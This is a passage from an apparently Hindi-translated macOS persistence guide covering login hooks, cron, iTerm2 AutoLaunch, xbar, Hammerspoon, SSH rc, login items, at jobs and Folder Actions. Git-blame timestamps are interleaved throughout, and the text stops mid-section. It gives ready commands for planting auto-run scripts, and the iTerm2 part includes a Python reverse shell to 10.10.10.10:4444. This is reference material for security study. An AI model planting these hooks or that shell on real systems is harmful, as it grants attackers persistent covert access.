{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
यह मेरे लिए काम नहीं किया, न ही उपयोगकर्ता LoginHook के साथ और न ही रूट LogoutHook के साथ
2023-09-28 20:05:35 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0022/ ](https://theevilbit.github.io/beyond/beyond\_0022/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-17 18:49:06 +00:00
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* आपको कुछ ऐसा निष्पादित करने में सक्षम होना चाहिए जैसे `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh`
2024-02-07 07:34:51 +00:00
* `Lo` cated in `~/Library/Preferences/com.apple.loginwindow.plist`
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
वे अप्रचलित हैं लेकिन उपयोगकर्ता लॉगिन करते समय कमांड निष्पादित करने के लिए उपयोग किए जा सकते हैं।
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
cat > $HOME/hook.sh < < EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
यह सेटिंग `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist` में संग्रहीत है।
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
2023-11-06 08:38:02 +00:00
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
2023-09-28 20:05:35 +00:00
}
2023-09-28 15:09:34 +00:00
```
2023-11-06 08:38:02 +00:00
इसे हटाने के लिए:
2023-09-28 20:05:35 +00:00
```bash
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
```
2024-09-21 18:25:44 +00:00
The root user one is stored in ** `/private/var/root/Library/Preferences/com.apple.loginwindow.plist` **
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
## Conditional Sandbox Bypass
2023-09-28 20:05:35 +00:00
{% hint style="success" %}
2024-09-21 18:25:44 +00:00
यहाँ आप **sandbox bypass** के लिए उपयोगी प्रारंभ स्थान पा सकते हैं जो आपको **किसी फ़ाइल में लिखकर** और **विशिष्ट "कार्यक्रमों के स्थापित होने, "असामान्य" उपयोगकर्ता** क्रियाओं या वातावरणों जैसी अपेक्षाकृत सामान्य स्थितियों की उम्मीद न करके** कुछ सरलता से निष्पादित करने की अनुमति देता है।
2023-09-28 15:09:34 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
### Cron
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0004/ ](https://theevilbit.github.io/beyond/beyond\_0004/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* Sandbox को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* हालाँकि, आपको `crontab` बाइनरी निष्पादित करने में सक्षम होना चाहिए
* या रूट होना चाहिए
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 15:09:34 +00:00
* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs` , `/private/var/at/jobs` , `/etc/periodic/` **
2024-09-21 18:25:44 +00:00
* सीधे लिखने के लिए रूट की आवश्यकता है। यदि आप `crontab <file>` निष्पादित कर सकते हैं तो रूट की आवश्यकता नहीं है
* **Trigger**: क्रोन कार्य पर निर्भर करता है
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2024-03-17 18:36:12 +00:00
2024-09-21 18:25:44 +00:00
वर्तमान उपयोगकर्ता के क्रोन कार्यों की सूची बनाएं:
2023-06-01 21:09:46 +00:00
```bash
crontab -l
```
2024-09-21 18:25:44 +00:00
आप उपयोगकर्ताओं के सभी क्रॉन कार्य भी देख सकते हैं ** `/usr/lib/cron/tabs/` ** और ** `/var/at/tabs/` ** (रूट की आवश्यकता है)।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
MacOS में कुछ फ़ोल्डर हैं जो **निश्चित आवृत्ति** के साथ स्क्रिप्ट निष्पादित करते हैं:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:05:35 +00:00
# The one with the cron jobs is /usr/lib/cron/tabs/
2023-06-01 21:09:46 +00:00
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
```
2024-09-21 18:25:44 +00:00
आप वहाँ नियमित **cron** **jobs** , **at** **jobs** (जिनका बहुत उपयोग नहीं होता) और **periodic** **jobs** (मुख्य रूप से अस्थायी फ़ाइलों को साफ़ करने के लिए उपयोग किया जाता है) पा सकते हैं। दैनिक आवधिक कार्यों को उदाहरण के लिए इस तरह चलाया जा सकता है: `periodic daily` ।
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
एक **user cronjob programatically** जोड़ने के लिए, इसका उपयोग करना संभव है:
2023-09-28 15:09:34 +00:00
```bash
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
```
2023-09-28 20:05:35 +00:00
### iTerm2
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0002/ ](https://theevilbit.github.io/beyond/beyond\_0002/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-07-17 18:49:06 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* iTerm2 को TCC अनुमतियाँ दी गई थीं
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: iTerm खोलें
2023-09-28 20:05:35 +00:00
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: iTerm खोलें
2023-09-28 20:05:35 +00:00
* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
2023-11-06 08:38:02 +00:00
* **ट्रिगर**: iTerm खोलें
2023-09-28 15:09:34 +00:00
2023-12-26 03:49:11 +00:00
#### विवरण और शोषण
2023-06-01 21:09:46 +00:00
2024-09-21 18:25:44 +00:00
**`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** में संग्रहीत स्क्रिप्ट्स निष्पादित की जाएंगी। उदाहरण के लिए:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:05:35 +00:00
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" < < EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
```
2024-09-21 18:25:44 +00:00
या:
2023-11-02 16:52:21 +00:00
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" < < EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os
async def main(connection):
2023-11-06 08:38:02 +00:00
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)
2023-11-02 16:52:21 +00:00
iterm2.run_forever(main)
EOF
```
2024-09-21 18:25:44 +00:00
स्क्रिप्ट ** `~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt` ** भी निष्पादित की जाएगी:
2023-09-28 20:05:35 +00:00
```bash
do shell script "touch /tmp/iterm2-autolaunchscpt"
```
2024-09-21 18:25:44 +00:00
iTerm2 की प्राथमिकताएँ ** `~/Library/Preferences/com.googlecode.iterm2.plist` ** में स्थित हैं, जो **iTerm2 टर्मिनल खुलने पर निष्पादित करने के लिए एक कमांड को इंगित कर सकती हैं** ।
2023-09-28 15:09:34 +00:00
2024-07-18 18:53:16 +00:00
यह सेटिंग iTerm2 सेटिंग्स में कॉन्फ़िगर की जा सकती है:
2023-09-28 20:05:35 +00:00
2024-07-17 18:49:06 +00:00
< figure > < img src = "../.gitbook/assets/image (37).png" alt = "" width = "563" > < figcaption > < / figcaption > < / figure >
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
और कमांड प्राथमिकताओं में परिलक्षित होता है:
2023-09-28 20:05:35 +00:00
```bash
plutil -p com.googlecode.iterm2.plist
{
2023-11-06 08:38:02 +00:00
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
आप कमांड को निष्पादित करने के लिए सेट कर सकते हैं:
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
{% code overflow="wrap" %}
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2
# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
2023-09-28 15:09:34 +00:00
```
2023-09-28 20:05:35 +00:00
{% endcode %}
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
{% hint style="warning" %}
2024-09-21 18:25:44 +00:00
बहुत संभावना है कि **iTerm2 प्राथमिकताओं का दुरुपयोग करने के अन्य तरीके** हैं ताकि मनमाने आदेशों को निष्पादित किया जा सके।
2023-09-28 20:05:35 +00:00
{% endhint %}
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
### xbar
2023-09-28 15:09:34 +00:00
2024-02-23 17:48:00 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0007/ ](https://theevilbit.github.io/beyond/beyond\_0007/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन xbar को स्थापित होना चाहिए
2024-03-17 18:36:12 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* यह एक्सेसिबिलिटी अनुमतियों की मांग करता है
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`~/Library/Application\ Support/xbar/plugins/`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: एक बार xbar निष्पादित होने पर
2023-09-28 20:05:35 +00:00
2023-12-29 15:17:36 +00:00
#### विवरण
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
यदि लोकप्रिय प्रोग्राम [**xbar** ](https://github.com/matryer/xbar ) स्थापित है, तो ** `~/Library/Application\ Support/xbar/plugins/` ** में एक शेल स्क्रिप्ट लिखना संभव है जो xbar शुरू होने पर निष्पादित होगी:
2023-12-29 15:17:36 +00:00
```bash
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" < < EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
```
2024-09-21 18:25:44 +00:00
### Hammerspoon
2023-12-29 15:17:36 +00:00
2024-09-21 18:25:44 +00:00
**Writeup**: [https://theevilbit.github.io/beyond/beyond\_0008/ ](https://theevilbit.github.io/beyond/beyond\_0008/ )
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
* Sandbox को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन Hammerspoon को स्थापित करना आवश्यक है
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
* यह Accessibility अनुमतियों की मांग करता है
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 20:05:35 +00:00
* **`~/.hammerspoon/init.lua`**
2024-09-21 18:25:44 +00:00
* **Trigger**: एक बार hammerspoon निष्पादित होने पर
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### Description
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
[**Hammerspoon** ](https://github.com/Hammerspoon/hammerspoon ) **macOS** के लिए एक स्वचालन प्लेटफ़ॉर्म के रूप में कार्य करता है, जो अपनी संचालन के लिए **LUA स्क्रिप्टिंग भाषा** का उपयोग करता है। विशेष रूप से, यह पूर्ण AppleScript कोड के एकीकरण और शेल स्क्रिप्टों के निष्पादन का समर्थन करता है, जिससे इसकी स्क्रिप्टिंग क्षमताओं में काफी वृद्धि होती है।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
ऐप एकल फ़ाइल, `~/.hammerspoon/init.lua` की तलाश करता है, और जब शुरू किया जाता है तो स्क्रिप्ट निष्पादित होगी।
2023-09-28 20:05:35 +00:00
```bash
2023-12-29 15:17:36 +00:00
mkdir -p "$HOME/.hammerspoon"
2023-09-28 20:05:35 +00:00
cat > "$HOME/.hammerspoon/init.lua" < < EOF
2023-12-29 15:17:36 +00:00
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
2023-09-28 20:05:35 +00:00
EOF
```
2024-02-13 00:55:17 +00:00
### BetterTouchTool
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन BetterTouchTool को स्थापित करना आवश्यक है
2024-03-17 18:36:12 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* यह Automation-Shortcuts और Accessibility अनुमतियों की मांग करता है
2024-02-13 00:55:17 +00:00
#### स्थान
* `~/Library/Application Support/BetterTouchTool/*`
2024-09-21 18:25:44 +00:00
यह उपकरण उन अनुप्रयोगों या स्क्रिप्टों को इंगित करने की अनुमति देता है जिन्हें कुछ शॉर्टकट दबाने पर निष्पादित किया जाना है। एक हमलावर अपने **शॉर्टकट और क्रिया को डेटाबेस में कॉन्फ़िगर करने में सक्षम हो सकता है** ताकि यह मनमाना कोड निष्पादित कर सके (एक शॉर्टकट बस एक कुंजी दबाने के लिए हो सकता है)।
2024-02-13 00:55:17 +00:00
### Alfred
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन Alfred को स्थापित करना आवश्यक है
2024-03-17 18:36:12 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* यह Automation, Accessibility और यहां तक कि Full-Disk एक्सेस अनुमतियों की मांग करता है
2024-02-13 00:55:17 +00:00
#### स्थान
* `???`
2024-09-21 18:25:44 +00:00
यह कार्यप्रवाह बनाने की अनुमति देता है जो कुछ शर्तें पूरी होने पर कोड निष्पादित कर सकते हैं। संभावित रूप से, एक हमलावर एक कार्यप्रवाह फ़ाइल बना सकता है और Alfred को इसे लोड करने के लिए मजबूर कर सकता है (कार्यप्रवाह का उपयोग करने के लिए प्रीमियम संस्करण का भुगतान करना आवश्यक है)।
2024-02-13 00:55:17 +00:00
2023-09-28 15:09:34 +00:00
### SSHRC
2024-07-18 18:53:16 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0006/ ](https://theevilbit.github.io/beyond/beyond\_0006/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन ssh को सक्षम और उपयोग करना आवश्यक है
2024-03-17 18:36:12 +00:00
* TCC बायपास: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* SSH का उपयोग FDA एक्सेस के लिए किया जाता था
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
* **`~/.ssh/rc`**
2024-09-21 18:25:44 +00:00
* **ट्रिगर**: ssh के माध्यम से लॉगिन
2023-09-28 15:09:34 +00:00
* **`/etc/ssh/sshrc`**
2024-09-21 18:25:44 +00:00
* रूट आवश्यक
* **ट्रिगर**: ssh के माध्यम से लॉगिन
2023-09-28 15:09:34 +00:00
2023-12-29 15:17:36 +00:00
{% hint style="danger" %}
2024-09-21 18:25:44 +00:00
ssh को चालू करने के लिए Full Disk Access की आवश्यकता होती है:
2023-12-29 15:17:36 +00:00
```bash
sudo systemsetup -setremotelogin on
```
{% endhint %}
2023-09-28 15:09:34 +00:00
2023-12-29 15:17:36 +00:00
#### विवरण और शोषण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
डिफ़ॉल्ट रूप से, जब तक कि `/etc/ssh/sshd_config` में `PermitUserRC no` न हो, जब एक उपयोगकर्ता **SSH के माध्यम से लॉगिन करता है** , तो स्क्रिप्ट ** `/etc/ssh/sshrc` ** और ** `~/.ssh/rc` ** निष्पादित की जाएंगी।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
### **लॉगिन आइटम**
2023-09-28 15:09:34 +00:00
2024-02-07 07:34:51 +00:00
लेख: [https://theevilbit.github.io/beyond/beyond\_0003/ ](https://theevilbit.github.io/beyond/beyond\_0003/ )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
* लेकिन आपको `osascript` को आर्ग्स के साथ निष्पादित करना होगा
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
2023-11-06 08:38:02 +00:00
* **ट्रिगर:** लॉगिन
2024-09-21 18:25:44 +00:00
* शोषण पेलोड ** `osascript` ** को कॉल करते समय संग्रहीत किया गया
2023-09-28 20:05:35 +00:00
* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
2023-11-06 08:38:02 +00:00
* **ट्रिगर:** लॉगिन
2024-09-21 18:25:44 +00:00
* रूट की आवश्यकता
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### विवरण
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
सिस्टम प्राथमिकताएँ -> उपयोगकर्ता और समूह -> **लॉगिन आइटम** में आप **उन आइटमों को पा सकते हैं जिन्हें उपयोगकर्ता लॉगिन करते समय निष्पादित किया जाएगा** ।\
इन्हें सूचीबद्ध करना, जोड़ना और कमांड लाइन से हटाना संभव है:
2023-09-28 15:09:34 +00:00
```bash
2023-09-28 20:05:35 +00:00
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'
#Add an item:
2023-11-06 08:38:02 +00:00
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
2023-09-28 20:05:35 +00:00
#Remove an item:
2023-11-06 08:38:02 +00:00
osascript -e 'tell application "System Events" to delete login item "itemname"'
2023-09-28 15:09:34 +00:00
```
2024-09-21 18:25:44 +00:00
ये आइटम फ़ाइल ** `~/Library/Application Support/com.apple.backgroundtaskmanagementagent` ** में संग्रहीत होते हैं।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
**लॉगिन आइटम** को **API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc)** का उपयोग करके भी इंगित किया जा सकता है, जो ** `/var/db/com.apple.xpc.launchd/loginitems.501.plist` ** में कॉन्फ़िगरेशन संग्रहीत करेगा।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
### ZIP को लॉगिन आइटम के रूप में
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
(लॉगिन आइटम के बारे में पिछले अनुभाग को देखें, यह एक विस्तार है)
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
यदि आप एक **ZIP** फ़ाइल को **लॉगिन आइटम** के रूप में संग्रहीत करते हैं, तो ** `Archive Utility` ** इसे खोलेगा और यदि ज़िप उदाहरण के लिए ** `~/Library` ** में संग्रहीत किया गया था और इसमें ** `LaunchAgents/file.plist` ** फ़ोल्डर था जिसमें एक बैकडोर था, तो वह फ़ोल्डर बनाया जाएगा (यह डिफ़ॉल्ट रूप से नहीं होता) और plist जोड़ा जाएगा ताकि अगली बार जब उपयोगकर्ता फिर से लॉगिन करे, तो **plist में इंगित बैकडोर निष्पादित होगा** ।
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
एक और विकल्प होगा कि उपयोगकर्ता HOME के अंदर फ़ाइलें ** `.bash_profile` ** और ** `.zshenv` ** बनाई जाएं, ताकि यदि फ़ोल्डर LaunchAgents पहले से मौजूद है, तो यह तकनीक अभी भी काम करेगी।
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
### At
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0014/ ](https://theevilbit.github.io/beyond/beyond\_0014/ )
2023-09-28 15:09:34 +00:00
2024-07-17 18:49:06 +00:00
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅ ](https://emojipedia.org/check-mark-button )
2024-09-21 18:25:44 +00:00
* लेकिन आपको ** `at` ** को **निष्पादित** करना होगा और इसे **सक्षम** होना चाहिए।
2024-07-17 18:49:06 +00:00
* TCC बायपास: [🔴 ](https://emojipedia.org/large-red-circle )
2023-12-30 01:27:36 +00:00
2023-11-06 08:38:02 +00:00
#### स्थान
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* आपको ** `at` ** को **निष्पादित** करना होगा और इसे **सक्षम** होना चाहिए।
2023-09-28 15:09:34 +00:00
2023-11-06 08:38:02 +00:00
#### **विवरण**
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
`at` कार्यों को **एक बार के कार्यों** को निश्चित समय पर निष्पादित करने के लिए डिज़ाइन किया गया है। क्रॉन कार्यों के विपरीत, `at` कार्य निष्पादन के बाद स्वचालित रूप से हटा दिए जाते हैं। यह ध्यान रखना महत्वपूर्ण है कि ये कार्य सिस्टम रिबूट के दौरान स्थायी होते हैं, जो उन्हें कुछ परिस्थितियों में संभावित सुरक्षा चिंताओं के रूप में चिह्नित करता है।
2024-02-23 17:48:00 +00:00
2024-09-21 18:25:44 +00:00
**डिफ़ॉल्ट** रूप से ये **निष्क्रिय** होते हैं लेकिन **रूट** उपयोगकर्ता इन्हें **सक्षम** कर सकता है:
2023-09-28 20:05:35 +00:00
```bash
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
2024-02-07 07:34:51 +00:00
यह 1 घंटे में एक फ़ाइल बनाएगा:
2023-09-28 20:05:35 +00:00
```bash
echo "echo 11 > /tmp/at.txt" | at now+1
```
2024-09-21 18:25:44 +00:00
`atq:` का उपयोग करके नौकरी की कतार की जांच करें:
2023-09-28 20:05:35 +00:00
```shell-session
sh-3.2# atq
26 Tue Apr 27 00:46:00 2021
22 Wed Apr 28 00:29:00 2021
```
2024-09-21 18:25:44 +00:00
ऊपर हम दो निर्धारित कार्य देख सकते हैं। हम `at -c JOBNUMBER` का उपयोग करके कार्य का विवरण प्रिंट कर सकते हैं।
2023-09-28 20:05:35 +00:00
```shell-session
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
2023-11-06 08:38:02 +00:00
echo 'Execution directory inaccessible' >& 2
exit 1
2023-09-28 20:05:35 +00:00
}
unset OLDPWD
echo 11 > /tmp/at.txt
```
{% hint style="warning" %}
2024-09-21 18:25:44 +00:00
यदि AT कार्य सक्षम नहीं हैं, तो बनाए गए कार्य निष्पादित नहीं होंगे।
2023-09-28 20:05:35 +00:00
{% endhint %}
2024-09-21 18:25:44 +00:00
The **job files** can be found at `/private/var/at/jobs/`
2023-09-28 20:05:35 +00:00
```
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
```
2024-09-21 18:25:44 +00:00
The filename contains the queue, the job number, and the time it’ s scheduled to run. For example let’ s take a loot at `a0001a019bdcd2` .
2023-09-28 20:05:35 +00:00
2023-11-06 08:38:02 +00:00
* `a` - यह कतार है
2024-09-21 18:25:44 +00:00
* `0001a` - जॉब नंबर हेक्स में, `0x1a = 26`
* `019bdcd2` - समय हेक्स में। यह युग से बीते मिनटों का प्रतिनिधित्व करता है। `0x019bdcd2` दशमलव में `26991826` है। यदि हम इसे 60 से गुणा करते हैं तो हमें `1619509560` मिलता है, जो कि `GMT: 2021. अप्रैल 27., मंगलवार 7:46:00` है।
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
If we print the job file, we find that it contains the same information we got using `at -c` .
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
### Folder Actions
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0024/ ](https://theevilbit.github.io/beyond/beyond\_0024/ )\
Writeup: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d ](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d )
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
* Useful to bypass sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* But you need to be able to call `osascript` with arguments to contact ** `System Events` ** to be able to configure Folder Actions
* TCC bypass: [🟠 ](https://emojipedia.org/large-orange-circle )
* It has some basic TCC permissions like Desktop, Documents and Downloads
2023-09-28 20:05:35 +00:00
2024-09-21 18:25:44 +00:00
#### Location
2023-09-28 15:09:34 +00:00
2023-09-28 20:05:35 +00:00
* **`/Library/Scripts/Folder Action Scripts`**
2024-09-21 18:25:44 +00:00
* Root required
* **Trigger**: Access to the specified folder
2023-09-28 20:05:35 +00:00
* **`~/Library/Scripts/Folder Action Scripts`**
2024-09-21 18:25:44 +00:00
* **Trigger**: Access to the specified folder
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
#### Description & Exploitation
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
Folder Actions are scripts automatically triggered by changes in a folder such as adding, removing items, or other actions like opening or resizing the folder window. These actions can be utilized for various tasks, and can be triggered in different ways like using the Finder UI or terminal commands.
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
To set up Folder Actions, you have options like:
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
1. Crafting a Folder Action workflow with [Automator ](https://support.apple.com/guide/automator/welcome/mac ) and installing it as a service.
2. Attaching a script manually via the Folder Actions Setup in the context menu of a folder.
3. Utilizing OSAScript to send Apple Event messages to the `System Events.app` for programmatically setting up a Folder Action.
* This method is particularly useful for embedding the action into the system, offering a level of persistence.
2023-09-28 15:09:34 +00:00
2024-09-21 18:25:44 +00:00
The following script is an example of what can be executed by a Folder Action:
2023-09-28 15:09:34 +00:00
```applescript
2024-02-07 07:34:51 +00:00
// source.js
2023-09-28 15:09:34 +00:00
